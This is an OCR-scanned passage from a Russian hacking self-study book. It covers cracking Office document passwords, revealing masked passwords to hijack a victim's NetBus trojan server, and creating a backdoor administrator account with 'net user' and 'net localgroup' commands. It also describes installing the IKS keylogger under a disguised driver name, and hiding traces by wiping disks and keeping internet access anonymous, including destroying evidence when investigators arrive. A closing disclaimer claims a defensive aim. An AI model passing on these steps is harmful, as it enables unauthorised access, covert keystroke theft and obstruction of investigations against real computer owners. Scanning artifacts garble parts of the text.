познакомиться с другими инструментами, то мы советуем обратить внимание на такую утилиту взлома паролей архивных файлов,
как AZPR компании Элкомсофт, или к набору утилит Passware Kit,
предоставляемых на сайте http://www.lostpassword.com. Последние утилиты обеспечивают взлом самых разнообразных ресурсов
Windows — сообщений электронной почты, /СО, архивов, документов, кошельков Window — но уступают OfficePassword по гибкости
настройки процесса взлома.

47

Самоучитель хакера

Пакет OfficePassword 3.5
Пакет инструментов OfficePassword 3.5 выглядит весьма впечатляюще и состоит
из целого набора инструментов взлома доступа к документам Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, документам MS Office — Excel, Word, Access, Outlook, к архивам ZIP и даже к модулям
VBA, встроенным в документы MS Office.
Программы OfficePassword 3.5 снабжены
удобным графическим интерфейсом и
весьма эффективными средствами настройки процедур взлома. Давайте убедимся в этом на примере взлома доступа
к документу Word с очень заманчивым
названием password.doc, который должен содержать пароли — а иначе зачем его
так называть?
Итак, выполнив поиск по файловой системе Windows, вы натолкнулись на файл
password.doc, который при попытке открытия отображает диалог с предложением ввести пароль (Рис. 3.13).
Вводить пароли наугад — дело бесперспективное, так что мы устанавливаем пакет
программ OfficePassword 3.5 и выполняем
такие шаги:
>• Выберите команду меню Пуск • Программы • OfficePassword (Start •
Programs * OfficePassword). Отобразится диалог программ OfficePassword (см. Рис. 3.14).

Password

ИИ

Enter password to open file
С : \test\password . doc

1

II
[ OK

Cancel

Puc. 3.13. Диалог ввода пароля
доступа к документу Word
I OfficePassword «DEMO»
File

Took

Option*

Я1-Ш]

Help

Selecl document
You can also diag-and-drop files from Internet Explorer onto this
window.
>» (c) 1998-2001 Vitas Ramanchauskas. LastBit Software Щелкните на кнопке Select document (Выберите документ) и с помощью
отобразившегося стандартного диалога Windows выберите файл взламываемого документа MS Office.
Чтобы повторить описываемую здесь пошаговую процедуру, следует предварительно создать файл документа Word с парольной защитой. Как это сделать, можно прочитать в справке программы
MS Word или в любом из многочисленных руководств. Учтите, что
демо-версия программы OfficePassword позволяет взламывать пароли длиной не более 3-х символов.
48

Проникновение в систему
Далее последовательно отобразятся два диалога с предупреждениями об ограничении демо-версии программы только тремя символами пароля, а также о возможной длительности процесса взлома пароля.
>• Оба раза щелкните на кнопке О К, и на экране появится диалог Select recovery
mode (Выберите режим восстановления), представленный на Рис. 3.15.
Select lecoverv mode
Jocument path: C:\test\passwotddoc (Word)
Version
: Wotd 8.0+
ntemal version: 133
Word language : Russian (0419)
incryption type: Strong
Text size
: 537
Preview
© Automatic
OflicePassword automatically selects most suitable recovery options. Recovery may take a
lot of time (up to several months in case ol a long password]. About 80% of all passwords
could be recovered within 48 hours. Use guaranteed recovery otherwise.
О User-defined
Adjust settings to optimize search for specific case. (This option is for advanced useis only.)
О Guaranteed recovery
Success is guaranteed! Important: please read the documentation. Additional fee may apply.
I Click here to learn тогеП

Cancel

| Display help info

Next»

Puc. 3.15, Взламывать пароль можно несколькими методами
> В диалоге Select recovery mode (Выберите режим восстановления) можно
выбрать такие режимы взлома пароля:
• Automatic (Автоматический режим), который наиболее прост для применения,
поскольку требует только щелчка на кнопке Next (Далее), после чего запустится процедура, использующая наиболее широко используемые возможности
взлома пароля.
• User-defined (Пользовательский режим), позволяющий вручную настроить
процедуру поиска пароля. Этот режим рекомендуется только для подготовленных пользователей.
• Guaranteed recovery (Гарантированное восстановление), которое, по утверждению авторов, способно восстановить любой пароль, независимо
от его длины.
> После выбора режима взлома пароля щелкните на кнопке Next

lOlficePasswoid ‘DEMO*
Password found:
‘007’ (without quotes)
The password has been copied onto the clipboard
Would you like to open the document now?

L

Yes

No

Puc. 3.16. Пароль успешно взломан!
49

Самоучитель хакера
(Далее). На экране появится диалог, отображающий процесс взлома, после
чего на экране отобразится полученный результат (Рис. 3.16).
Остальные инструменты OfficePassword 3.5 работают аналогичным образом, позволяя эффективно решать задачу доступа к различным документам, защищенным
паролем. Единственная проблема — это время, требуемое для взлома. Если пароль
достаточно длинен и сложен, то его взлом может потребовать неимоверно больших ресурсов — а основной постулат криптографии гласит, что усилия на взлом
документа должны соответствовать его ценности.
Создатели программы рекомендуют начать восстановление с автоматического режима, и только в случае, когда после 24-28 часов
работы пароль не будет взломан, переходить к режиму гарантированного восстановления. Пользовательский режим восстановления обязательно следует применить, если пароль содержит
символы, не входящие в алфавит английского языка.
Поэтому перед тем, как запускать на всю катушку процедуру взлома, стоит попробовать еще одну возможность — выявления паролей, скрытых за строкой
звездочек.

Пароли зз строкой «******»
Все, кто когда-либо работал с приложениями, требующими ввода пароля для
доступа к определенным ресурсам, (например, при создании удаленного соединения с сервером Интернета), должно быть знают, что очень часто в строке ввода пароля отображается строчка звездочек типа «******». Иногда эти звездочки
просто закрывают отображение содержимого в поле, хотя сама информация, относящаяся к полю ввода, уже содержится в памяти компьютера. Это — недостаток программирования, поскольку имеются средства, позволяющие увидеть то,
что скрыто за строкой звездочек. Таким образом, вместо длительного взлома
паролей хакер получает их без всякого затруднения.
Хотя ценность таких инструментов ныне значительно уменьшилась, поскольку разработчики программ не сидят сложа руки и научились скрывать
пароли по-настоящему, все же с помощью программ определения паролей
за строкой звездочек можно достичь немалого успеха. Например, можно
получить такую интересную вещь, как пароль доступа к серверу трояна
NetBus для последующего использования. На Рис. 3.17 представлен пример
применения с этой целью известной утилиты Revelation от компании SnadВоу (http://www.snadboy.com) к строке пароля доступа к серверу NetBus в
диалоге настройки соединения клиента NetBus.

50

Проникновение в систему

ттт

•Л* SnadBoy’s Revelation
‘Circled V Cursor
Drag to reveal password

| Check For Update) |

About

Exit
I Copy to clipboard

Text ol Window Under ‘Circled V Cursor (il available)

007
Status
Revelation active.

Length of available text: 3

Reposition Revelation out of the way when dragging ‘circled V
When minimized, put in System Tray

i SWORD-2000
iMycq

Change Hoct

л^

«Host informationDestination: |SWORD-200
Host name/IP: 1.0-0-1
TCP-port:

П Always on top
Д Hide ‘How to’ instructions

How to
1) Left click and drag (while holding down the left mouse button) the ‘circled V

2) As you drag the ‘circled +’ cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window…’ box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE — II the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE — Not an of the fields that the cursor passes over will have text that can be revealed. Check
the status light foi availability of text.
Bright green — text available (See length of text:’ in Status area)
Blight red — no text available

User name: |Administrator
Password:

Cancel

Puc. 3.17. Пароль доступа к серверу NetBus хоста Sword-2000
в нашем распоряжении!
Утилита Revelation действует следующим образом. Хакер перетаскивает мышью
изображение прицела из поля ‘Circled+’Cursor (‘Кружок+’Курсор) в диалоге
SnadBoy’s Revelation на строку для ввода пароля (этот прицел на Рис. 3.17 виден на поле Password (Пароль)). После этого в диалоге программы Revelation, в
строке Test of Window Under Circles and Cursor (if available) (Проверка поля
под «кружком и курсором» (если доступно)) отображается пароль (если он там
имеется). Как видно из Рис. 3.17, мы восстановили пароль 007 и теперь получили доступ к серверу NetBus хоста Sword-2000, который используется хозяином
взломанного компьютера в его целях (а мы будем использовать в своих целях).
Тем самым хакер избежал взлома доступа к средствам удаленного управления
(серверу NetBus) трудоемкими методами [11].

Создание потайных ходов
Посидев какое-то время за чужим компьютером, и кое-что успев, а кое-что и не
успев сделать, хакер должен уносить ноги, поскольку хозяин вот-вот вернется.
Однако перед уходом ему требуется сделать две вещи: устранить следы своего пребывания на компьютере и обеспечить себе возможность повторного проникновения.
51

Самоучитель хакера
Первая задача настолько важна, что мы отвели ей целую Главу 4. Сейчас же
сконцентрируемся на второй задаче — создании потайных ходов во взломанный
компьютер, позволяющих хакеру повторно навещать свою жертву, в том числе
удаленно, решая свои проблемы за чужой счет и без всяких хлопот. Причем, однажды добравшись до компьютера, хакер должен сделать так, чтобы даже в случае обнаружения одного из потайных ходов можно было немедленно создать
новый. На сленге такие ходы так и называют — «бэкдор», от английского слова
«backdoor» — черный ход, и для его создания можно прибегнуть к ухищрениям,
кратко описываемым в последующих разделах.

До£а&ле*ше учетных записей
Добавив перед выходом из компьютера учетную запись с высокими привилегиями, хакер сможет в дальнейшем входит в систему, в том числе удаленно и, при необходимости, создавать себе новые потайные ходы. Такая процедура делается
двумя командами MS-DOS: NET USER /ADD,
создающей новую учетную запись с указанным именем и паролем, и NET
LOCALGROUP /ADD, добавляющая созданную учетную запись в указанную локальную группу. На Рис. 3.18 представлен результат исполнения этих команд.
r^JCommand Prompt

— NewUser 00Г /add
|The command completed successfully.
C:\>net localgroup fldministrators NewUspr /add
I The command completed successfully.

Puc. 3.18. Создание потайного хода для пользователя
NewUser прошло успешно
Теперь новоиспеченный пользователь NewUser может без проблем входить в
компьютер, в том числе удаленно, и заниматься там своими делами без помех.
А если создать несколько таких учетных записей, то по мере их выявления хакер
может создавать все новых и новых пользователей, делая попытки защитить
компьютер практически невыполнимыми.

52

Проникновение в систему

Автозагрузка утилит
Однако создание собственной учетной записи — дело опасное, поскольку системный администратор имеет все возможности немедленно выявить свежеиспеченного пользователя компьютера. Тогда можно воспользоваться другой возможностью Windows — поместить в папку автозагрузки Startup внутри папки
Document and Settings (Документы и настройки) файлов программ, автоматически загружающихся при входе в систему пользователя. Причем программы из
папки Startup, находящейся в папке All users, будут запускаться для всех пользователей системы.
Хакер устанавливает в папку автозагрузки свою программу, которую он может
назвать совершенно безобидным именем, под которым она и будет скрытно исполняться. В число хакерских утилит могут входить троянские кони, клавиатурные шпионы (кейлоггеры), утилиты удаленного управления. В этой главе мы
опишем работу с очень популярным кейлоггером IKS (Invisible KeyLogger
Stealth — Невидимый клавиатурный шпион), демо-версию которого можно загрузить с сайта http://www.amecisco.com.

Клавиатурные шпионы
Клавиатурные шпионы — это программы, регистрирующие нажатия клавиш на
компьютере. Принцип их действия прост — все нажатия на клавиши перехватываются программой, и полученные данные записываются в отдельный файл, который далее может быть отослан по сети на компьютер взломщика.
Клавиатурный шпион IKS можно назвать весьма популярной программой — по
утверждению авторов на сайте http://www.amecisco.com, кейлоггер Invisible
KeyLogger 97 вошел под номером 8 в список 10 изделий, которые способны «напугать вас до смерти». Текущая версия кейлоггера функционирует на системах
Windows NT/2000/XP, внедряясь в ядро системы, что позволяет программе перехватывать все нажатия клавиш, включая 1Г^’ l+ir^n+l0″8″]. Поэтому IKS позволяет даже перехватывать нажатия клавиш при входной регистрации в системе
Windows NT/2000/XP. Таким образом, программа IKS действует подобно драйверу клавиатуры, перехватывая все нажатые клавиши и записывая их в журнальный файл.
Установка программы IKS не вызывает трудностей. После запуска загруженного с
Web-сайта файла iks2k20d.exe отображается диалог, представленный на Рис. 3.19.

53

Самоучитель хакера
D Standard Install | p Stealth Install | D Uninslall |

It’s recommended that you use Standard Install if this is your first time in using IKS. Just
accept the defaults and dick on «Install Now» button. Or you can dick on ‘Read readme M»
to get familiar with the concept of IKS first.
During a standard installation a program directory will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile
renaming (stealth features) will take place.
Install Directory
|C \Progrem Files\iks
You need to heva administrator rights on this system for it to install successfully.

rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the
«Unmstall» tab, then «Uninstall Now» to automatically uninstall the standard installation.

Read readme.M

Рис. 3.19. Инсталляция кеилоггера IKS весьма проста
Щелчок на кнопке Install Now (Установить сейчас) устанавливает демо-версию
кейлоггера. Полная версия IKS допускает замену имен установочных файлов произвольными именами для сокрытия работы программы. Единственным файлом,
необходимым кейлоггеру IKS для работы, является файл iks.sys, который может
быть переименован с целью сокрытия его от пользователей. Все нажатые пользователем клавиши записываются в текстовый и двоичный файл, просматриваемый
с помощью программы dataview.exe, окно которой представлен на Рис. 3.20.
Settings • Help

0 Filter Out Arrow Keys
D Filter Out Ctrl and Alt Keys
П Rtter Out F1 to FT 2 Keys
О Filter Out All Other Function Keys

Ф Use Notepad
О Translate to Text Only
Gear La a
П Clear Binary Log Upon Exit
0 dear Text Log Upon Exit

Import Binary Log From:

Save Text Log To:
C:\DOCUME~1\ADMINI~1.000\LOCALS

I Browse,

Puc. 3.20. Диалог управления регистрацией клавиш
и хранением журнальных фатов

54

Проникновение в систему
Щелчок на кнопке Go! (Вперед) открывает файл журнала, хранящий все нажатые клавиши. С помощью диалога на Рис. 3.20 можно настроить работу кейлоггера так, что будут отфильтровываться все нажатые функциональные клавиши
на клавиатуре, а также очищаться содержимое журнала.
Как мы уже говорили, кейлоггер IKS функционирует как низкоуровневый драйвер, что скрывает его присутствие в системе. Однако файл iks.sys этого кейлоггера записывается в каталог KOpeHb_CHCTeMbi/system32/drivers, а в системном
реестре появляется регистрационная запись (эта запись выделена в диалоге редактора системного реестра Regedt32 на Рис. 3.21).
Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi
Registry Edit Tree View Security Options Window
SGemuwa
SGpc
&I37DRIVER
CEJIAS
Й ICQ Groupware £
COIISADMIN
IPMksl
CD ILDAP
•QIMAP4D32
•GDIMonitor
Й inetaccs
C±llnetln(o

яШип

Help

Start: REG_DWORD: 0x3
Type: REG_DWORD: 0x1

•Ш Inport

Puc. 3.21. В системном реестре Windows появилась предательская запись
С помощью таких записей в системном реестре все установленные в системе
кейлоггеры идентифицируются без всяких проблем (например, это с успехом
делает программа The Cleaner, особенно полезная для поиска троянских коней).
Чтобы преодолеть такой недостаток кейлоггера IKS, на вкладке Stealth Install
(Скрытая установка) инсталляционного диалога (Рис. 3.19) можно изменить имя
устанавливаемого драйвера на какое-нибудь безобидное, типа calc.sys, чтобы
запутать систему защиты (собственно, отсутствие этой возможности — основное
отличие демо-версии от полной).
Некоторым недостатком IKS является отсутствие поддержки средств передачи
накопленных данных по сети. Этого недостатка лишен кейлоггер 007 Stealth
Monitor, который умеет отслеживать посещения пользователем Web-сайтов, введенные пароли, запущенные программы, время обращения к файлам и другие
действия пользователя. Однако эта программа плохо маскирует свою работу — ее
процесс виден в диспетчере задач Windows, хотя хакер может заменить название
процесса каким-то другим, например, notepad.exe.

55

Самоучитель хакера

Заключение
Описанные в этой главе инструменты позволяют получить доступ к ресурсам
компьютера, защищенного паролем BIOS, экранными заставками и средствами
входной регистрации. Для их использования хакер должен работать непосредственно на консоли атакуемой системы, что несколько снижает ценность предложенных здесь технологий. В самом деле, опыт показывает, что при наличии физического доступа к компьютеру хакер просто похищает его жесткий диск для
последующей «работы». Тем не менее, все описанные здесь средства — это отнюдь не игрушки, и если система защиты компьютера плохо настроена, а политика безопасности организации, мягко говоря, слабовата (что весьма традиционно), то хакер, овладев описанными в главе методами, может достичь очень
и очень многого.
А для антихакера здесь наука — не будь ламером, защищай систему паролями
достаточной сложности, не бросай компьютер без всякой защиты на растерзание
типам вроде доктора Добрянского и иже с ним. Одна только установка шаблона
безопасности для рабочей станции Windows 2000/XP вполне способна пресечь
многие и многие штучки подобного рода персонажей. Что касается пользователей Windows 9x/Me, то их возможности по защите системы невелики — только
применение методов шифрования, наподобие предоставляемых пакетом PGP
Desktop Security, может защитить их компьютер от полного разгрома. Сама же
по себе система защиты Windows 9x/Me весьма слаба, как мы могли только что
убедиться.
Ну ладно, компьютер взломан, права доступа получены достаточные, информация выкачана, потайные ходы установлена — что же дальше? Пора замести следы
и вовремя смыться. Так что переходим к следующей главе.

56

Г Л А В А 4.

Сокрытие следов
Сокрытие следов — важнейший этап работы хакера, поскольку, выявив признаки
несанкционированной деятельности хакера, антихакер сразу же предпримет
меры защиты. Все это соответствует реальному миру, где преступники, приступая к «работе», надевают перчатки и маски, вешают фиктивные номера на автомобили, ну и так далее — все вы, наверное, хоть раз, да смотрели гангстерские
фильмы. Действуя в виртуальном мире, всякие разные «кул хацкеры», если они
хоть чего-то стоят, также должны предусмотреть, причем со всем тщанием, способы сокрытия следов своей деятельности.
Вообще говоря, тема сокрытия своей деятельности в виртуальном мире — весьма
актуальна и многогранна. В Главе 1 уже приводился тот печальный факт, что около 50% всех попыток удаленного взлома компьютерных систем выполняется с
домашних компьютеров, подключенных к серверам Интернета через телефонные
линии — причем серверы Интернета, все как один, снабжены устройствами АОН.
Стоит ли тут удивляться многочисленным сообщениям о поимке «страшного
преступника», который, запустив хакерскую программу автоподбора паролей
входной регистрации на сервере провайдера Интернета, считает себя полностью
неуязвимым. Причем такая уверенность основана на смехотворном, хотя и психологически понятном факторе,- ведь хакер сидит в своей квартире за закрытой дверью, где его «никто не видит», в то время как программа подбирает отмычки к входной двери чужого дома. Результаты такого «хакинга» иногда показывают в телевизионных новостях, под рубрикой «криминальная хроника»
(что и неудивительно).
Так что автор настоятельно предлагает всем любителям обсуждаемого жанра
самым внимательным образом почитать эту главу, прежде чем решиться на какие-либо действия (никак не поощряемые автором).
Автор в очередной раз предупреждает читателей об ответственности за все деяния в виртуальных просторах Интернета,
которые могут быть выполнены с помощью описанных в этой
книге программ и методов. Учтите, что книга написана с единственной целью — научить вас противостоять хакерским нападениям, что, безусловно, требует знания хакерских технологий.
За прямое применение описанных в книге технологий и их последствия автор ответственности не несет.

Самоучитель хакера

Дбз аспекта задачи сокрытия следов
Вообще говоря, каждый человек, работающий с компьютером, должен самым
внимательным образом отнестись к проблеме сохранения своей конфиденциальности. Дело в том, что вся хранящаяся в вашем компьютере, домашнем или рабочем, информация — это отражение вашей деятельности в виртуальном мире
Интернета. И раскрытие этой информации приводит к нарушению того, что англичане называют privacy — конфиденциальность личной жизни. Работая на компьютере, вы неизбежно оставляет за собой следы в виртуальном компьютерном
мире, следы, которые, если не предпринять особых мер, запросто позволяют
идентифицировать вашу личность в реальном, физическом пространстве, что не
всегда полезно и очень часто приводит к неприятностям.
Что касается обычных пользователей, то им автор рекомендует почитать книгу [10],
где красочно описаны случаи из жизни (правда, «за бугром») разного рода личностей, которые по разным причинам — беспечности, неопытности и тому подобным недостаткам — забыли о защите этой самой privacy. Такие люди, как
правило, пребывают в полной уверенности, что виртуальный мир Интернета,
или, как сейчас говорят, киберпространство — это нечто потустороннее, никак не
связанное с их жизнью в реальном мире. Но не о них сейчас речь.
Речь сейчас идет о том, как должен вести себя человек, который, путешествуя по
виртуальному компьютерному миру, любит перелезать через всякие там разные
шлагбаумы и заборы с табличкой «проход закрыт», и гулять по запретной территории киберпространства. Ясно, что при таких путешествиях следует придерживаться особых правил личной безопасности и конфиденциальности. Эта задача имеет два аспекта.
Во-первых, это локальная безопасность. Следует иметь в виду, что все эти
штучки в виртуальном компьютерном мире оставляют следы и в вашем компьютере, что может стать источником больших проблем. Вы сами подчас
можете увидеть на экранах телевизоров, как вслед за очередным, пойманным по
горячим следам, «кул хацкером» несут системный блок его компьютера — ясно,
что не на продажу.
Во-вторых, это глобальная безопасность. При прогулках в киберпространстве
хакеру следует оставлять как можно меньше следов хотя бы на закрытых для
постороннего входа территориях. Следует ясно понимать, что любые ваши действия в Интернете отслеживаются Web-серверами и фиксируются в журнальных
файлах как сервера провайдера Интернета, так и посещенных вами Webсерверов, и выявить по этим записям ваше местоположение в реальном мире сущие пустяки.
Так что есть смысл рассмотреть, где могут скрываться источники угроз для личностей, занимающихся всякими штучками и проделками в киберпространстве,

58

Сокрытие следов
затрагивающими интересы других людей (кстати, эти сведения не будут лишними и для всех прочих пользователей компьютеров).

Локальная безопасность
Итак, предположим, что вы с помощью своего верного друга-компьютера натворили делишек, за что и пострадали, и теперь ваш системный блок — в руках разного рода следопытов. Ну и что же они там могут такого увидеть, в этом вашем
системном блоке? Да почти все, что надо, чтобы сделать вашу участь просто прискорбной на ближайшие несколько лет. На винчестере компьютера можно найти:
• Наборы хакерских программ, которые вы использовали для своей деятельности.
• Историю путешествий в Интернете, рассказанную вашим Web-браузером.
• Вашу переписку по электронной почте, в том числе давным-давно удаленную
из почтовых ящиков.
• Различные файлы данных, которые вы извлекли из чужих компьютеров без
спроса у хозяев.
• Множество документов в корзине Windows, которые вы удалили программой
Проводник (Explorer) и решили, что все концы спрятаны в воду.
• Информацию о недавно открытых документах, хранимая в файле подкачки
Windows.
• Информацию в файле резервной копии системы, а также в файлах резервных
копий документов MS Office.
Так что ваш компьютер, по сути, преподносит всем, кому угодно на блюдечке с
голубой каемочкой всю информацию о вас и вашей деятельности. Откуда же
поступает эта информация? Давайте вначале рассмотрим каналы утечки конфиденциальной информации, предваряя обсуждение мер по их перекрытию.

Гибкие и жесткие диски
Одним из каналов утечки информации о вашей деятельности на компьютере являются гибкие и жесткие диски. Суть дела в том, что гибкие и жесткие диски
хранят гораздо больше данных, чем это можно увидеть в окне программы Проводник (Explorer) при их просмотре, о чем очень часто забывают владельцы дисков. Следует твердо помнить, что удаление файлов на диске командой Удалить
(Delete) проводника Windows ничего, фактически, не удаляет. Все такие файлы
попадают в корзину Windows и, кроме того, на дисках могут остаться их временные копии, создаваемые, например, приложениями MS Office. Чтобы увидеть это
воочию, включите режим отображения скрытых файлов, установив переключатель Показывать скрытые папки и файлы (Show hidden files and folders) в
59

Самоучитель хакера
диалоге Свойства папки (Folder Options) проводника Windows. Этот диалог открывается командой Сервис * Свойства папки (Tools * Folder Options) (Рис. 4.1).
)0бщие j Вид

(мА

| Типы файлов | Автономные файлы j

I

Можно отображать все папки е одинаковом виде.
| Как у текущей папки | | Сброс для всех папок

Ьпогните льные параметры:
И Отображать папку «Мои документы» но рабочем столе
Г;
D Отображать сжатые файлы и папки другим цветом
0 Помнить параметры отображения каждой папки
0 Скрывать защищенные системные файлы (рекомендуется)
Q Скрывать расширения для зарегистрированных типов файлов Г
Ш Скрытые файлы и палки
Q Ыпровление парами веб-страниц и попок
© Показывать и обрабатывать пару как единый файл
О Показывать обе части и обрабатывать их отдельно
О Показывать обе части, но обрабатывать их клк единый фай/ «
004.tmp
•|~WRL1120.tmp
~WRL19B2.tmp
|~WRL3531.tmp

|и| Мой компьютер

Puc. 4.2. Папка со скрытыми файлами,
оставшимися после удаления основного файла документа
Как видим, после удаления файла в папке осталось несколько его копий — временные файлы .ТМР, резервные копии .WBK, оставшийся после зависания ком60

Сокрытие следов
пьютера файл, начинающийся с символов ~$. Более того, если все эти файлы
также удалить, в том числе, и из корзины Windows, фрагменты информации,
содержащиеся в документе, все равно останутся в файле подкачки системы
Windows. Вам, наверное стало ясно — что ничего вы, в сущности, не удалили все ваши делишки налицо. Что же теперь делать?
Для надежного удаления всей информации, относящейся к файлу документа MS Office, следует применять специальные утилиты очистки дисков,
предоставляемые многими приложениями, например, Norton Utilities. Мы
же рассмотрим сейчас более эффективное средство очистки дисков от всякого компрометирующего мусора — программу Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmlttClndisk).

Очистка файлов и папок
Чтобы стереть файл так, чтобы его не смогла прочитать программа восстановления
файлов, следует физически перезаписать все биты файла, хранящиеся на диске. Однако это не так просто, как может показаться на первый взгляд. Для надежной очистки носитель секретной информации должен перезаписываться многократно, с
использованием шаблонных байтов информации, генерируемых случайным образом. Число итераций зависит от важности информации и типа ее носителя — стандарт министерства обороны США, например, требует трехкратной перезаписи.
Только это может гарантировать высокую (но не 100%) степень очистки.
На Рис. 4.3 представлен диалог утилиты Clean Disk Security 5.01
(http://www.the-absolute.net/sware/
index.html#Clndisk), которая удовлетворяет основным требованиям,
предъявляемым к средствам очистки
носителей секретной информации
(и даже несколько их усиливает).
Утилита Clean Disk Security 5.01
позволяет стирать отдельные файлы и папки на дисках с помощью
команды контекстного меню Erase
fully (Полное стирание). Утилита
обеспечивает полное стирание уничтожается как сама информация
в файлах, так и все ее следы, ос- Рис. 4.3. Утилита Clean Disk Security 5.01
тавшиеся в различных буферах и
выполняет очистку дисков
таблице размещения файловой сисчетырьмя методами
темы (поддерживаются файловые
61

Самоучитель хакера
системы FAT и NTFS). Также стирается информация, содержащаяся в свободных областях кластеров файловой системы, используемых стираемым файлом.
Утилита позволяет очищать файл подкачки Windows, корзину Windows, папку
Temp с временными файлами (в которую, например, загружаются распаковываемые инсталляционные файлы) и очищать списки последних использованных
файлов. При желании пользователь может очистить кэш-память, используемую
браузерами Интернета для хранения загруженных файлов, списки, хранящие
предысторию работы в Интернете и файлы куки (cookie). Все эти возможности
устанавливаются с помощью флажков, представленных в главном диалоге утилиты (Рис. 4.3).
Как видно на Рис. 4.3, утилита предоставляет четыре метода очистки:
• Simple (Простой) — допускает выполнение до 6 проходов, во время которых
на диск записываются случайно генерируемые символы. Этот метод пригоден для большинства случаев; обычно бывает достаточно 1 прохода.
• NIS — поддерживает до 7 проходов с записью случайно генерируемых символов (т.е. наборов бит определенной длины) и их преобразований.
• Gutmann — поддерживает до 35 проходов с записью случайно генерируемых
шаблонов (т.е. последовательностей случайно генерируемых бит). Этот метод
предложен Питером Гутманом (Peter Gutmann) из департамента компьютерных наук университета г. Окленд. Полная очистка этим методом занимает много времени, но зато обеспечивает защиту от сканирования диска высокоточным
оборудованием (есть и такое).
• Test mode (Тестовый режим) — выполняет за один проход запись символа #10
кода ASCII.
Все эти возможности впечатляют. Очевидно, что утилита Clean Disk Security 5.01
представляет собой профессиональный инструмент для стирания информации
и, к тому же, снабженный удобным интерфейсом и исчерпывающей справочной системой.
Вот вам совет, почерпнутый из [10]. Чтобы по-настоящему надежно прикрыться
от всяких следопытов, сделайте следующее: купите себе источник бесперебойного питания (UPS); подготовьте надежную утилиту полной очистки жесткого
диска компьютера. Далее, как только к вам придут нежданные гости, запустите
утилиту очистки и дождитесь завершения ее работы. Источник бесперебойного
питания поможет вам довести операцию до конца, если ваши гости выключат
электропитание в вашей квартире.

62

Сокрытие следов

Очистка системного реестра
Наконец, упомянем угрозу, исходящую от системного реестра. В нем хранится
очень и очень много всего такого, что выдаст вас с головой, стоит только там
покопаться квалифицированному специалисту. Вообще-то, именно по этой причине системный реестр пользуется повышенным вниманием хакера, но в данном
случае мы имеем в виду внимание людей, интересующихся самими хакерами.
Так что не стоит пренебрегать его очисткой от порочащих вас данных, хотя сделать это достаточно сложно. Дело в том, что автоматизированные утилиты очистки реестра, к примеру, Norton Utilities, обеспечивают удаление только ненужных записей, оставшихся после установки/удаления программ, создания и удаления ярлыков и так далее. Избирательно очищать реестр от конфиденциальных
данных они не умеют, и все это следует делать руками, в лучшем случае с помощью самодельных сценариев [10].
Так что лучший выход (исключая полную очистку системы) —

это закрытие доступа к реестру для всех, кроме администратора системы, что можно сделать
средствами редактора реестра regedt32. Далее следует рассмотреть вопрос об
использовании криптографических средств для защиты хакерской системы от
нежелательного просмотра любителями чужих секретов. Например, можно прибегнуть к средствам шифрования файлов и папок, предоставляемым файловой
системой NTFS.

Глобальная безопасность
В начале главы уже отмечалось, что главная опасность, которая подстерегает
хакера, проводящего различные акции в Интернете — это ложное ощущение
своей анонимности и неуязвимости. Следует твердо помнить, что все — абсолютно все — действия в Интернете отслеживаются Web-серверами и фиксируются в специальных журналах. Далее эти сведения могут быть предоставлены
кому угодно, в том числе и людям, потерпевшим от ваших действий. Поэтому
при работе в Интернете следует соблюдать особую осторожность. Обсудим
самые опасные ситуации, подстерегающие пользователя, подсоединившегося к
Интернету.

ТТро&айдеры
При подключении к Интернету, прежде всего, следует позаботиться об анонимности подключения к серверу провайдера Интернета. Так что при выборе провайдера Интернета прежде всего постарайтесь избежать авторизованного доступа к Интернету и вместо заключения договора отдайте предпочтение покупке
карточки Интернета. Такие карточки ныне общедоступны, и при их покупке вы
сохраняете свою анонимность.

63

Самоучитель хакера
Однако анонимность покупки карточки вовсе не означает вашей анонимности
при работе в Интернете, что напрямую связано с конфиденциальностью и безопасностью вашей информации. В настоящее время провайдеры Интернета устанавливают на входных телефонных линиях своего сервера устройства автоматического определения номера (АОН). При подключении к серверу провайдера
Интернета местная АТС, в ответ на запрос сервера, отсылает ему телефонный
номер входящего звонка, и сервер записывает этот номер в журнал вместе с вашей учетной записью. В процессе работы в Интернете сервер провайдера будет
автоматически фиксировать все ваши действия (адреса посещенных Web-узлов,
использованные протоколы, возможно, фрагменты трафика), ассоциируя их с
вашей учетной записью, хранящей, в том числе, выявленный устройством АОН
номер вашего телефона. Так что, в случае необходимости, найти вас не представляет никакого труда.
Для борьбы с этим злом предлагается множество методов (см., к примеру [5],
[10], или выпуски журнала «Хакер» — автор бессилен передать все многообразие
методов и уловок, которые можно встретить на страницах этого, в высшей степени полезного источника). Скажем, предлагается устанавливать на своем компьютере устройство анти-АОН, которое призвано блокировать передачу станцией
АТС вашего телефонного номера серверу провайдера Интернета. Однако надежность защиты, обеспечиваемой этими устройствами, никем толком не проверена, поскольку все они разработаны и изготовлены радиолюбителями. Так что
вряд ли стоит полагаться на эффективность таких устройств, как анти-АОН.
Если уж вы решитесь на использование анти-АОН, программных или аппаратных, для начала проверьте их эффективность. Многие провайдеры Интернета
предоставляют своим пользователям статистику подключений по пользовательской учетной записи. Это делается для контроля пользователями расходов бюджета, выявления нелегальных подключений и так далее. Так вот, в этой статистике приводятся телефоны, с которых выполнялись подключения, выявленные
устройствами АОН провайдера. Так что включите свой анти-АОН, выполните
несколько подключений к Интернету и проверьте — что из этого получилось,
прежде чем пускаться во все тяжкие!
Общая рекомендация такова — если вы хотите сделать в Интернете нечто, требующее полной конфиденциальности, никогда и ни при каких обстоятельствах
не используйте телефон, номер которого позволит выявить вашу личность. И уж
во всяком случае, НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ДОМАШНИЙ ТЕЛЕФОН ЭТО АБСОЛЮТНО, БЕЗУСЛОВНО И СОВЕРШЕННО НЕДОПУСТИМО!!!

Анонимайзеры
При запросе страницы Web-сайта компьютеру приходится обмениваться с сервером определенной информацией, и этот процесс не ограничивается передачей
64

Сокрытие следов
.вам для просмотра HTML-кода запрошенной Web-страницы. В процессе обмена
сервер может получить с компьютера Web-путешественника и другую информацию, в том числе идентифицирующую тип компьютера, предыдущий посещенный вами Web-сайт, идентифицирующие вас адреса электронной почты и
тому подобное.
Чтобы более четко уяснить возможности по вашей идентификации, имеющиеся
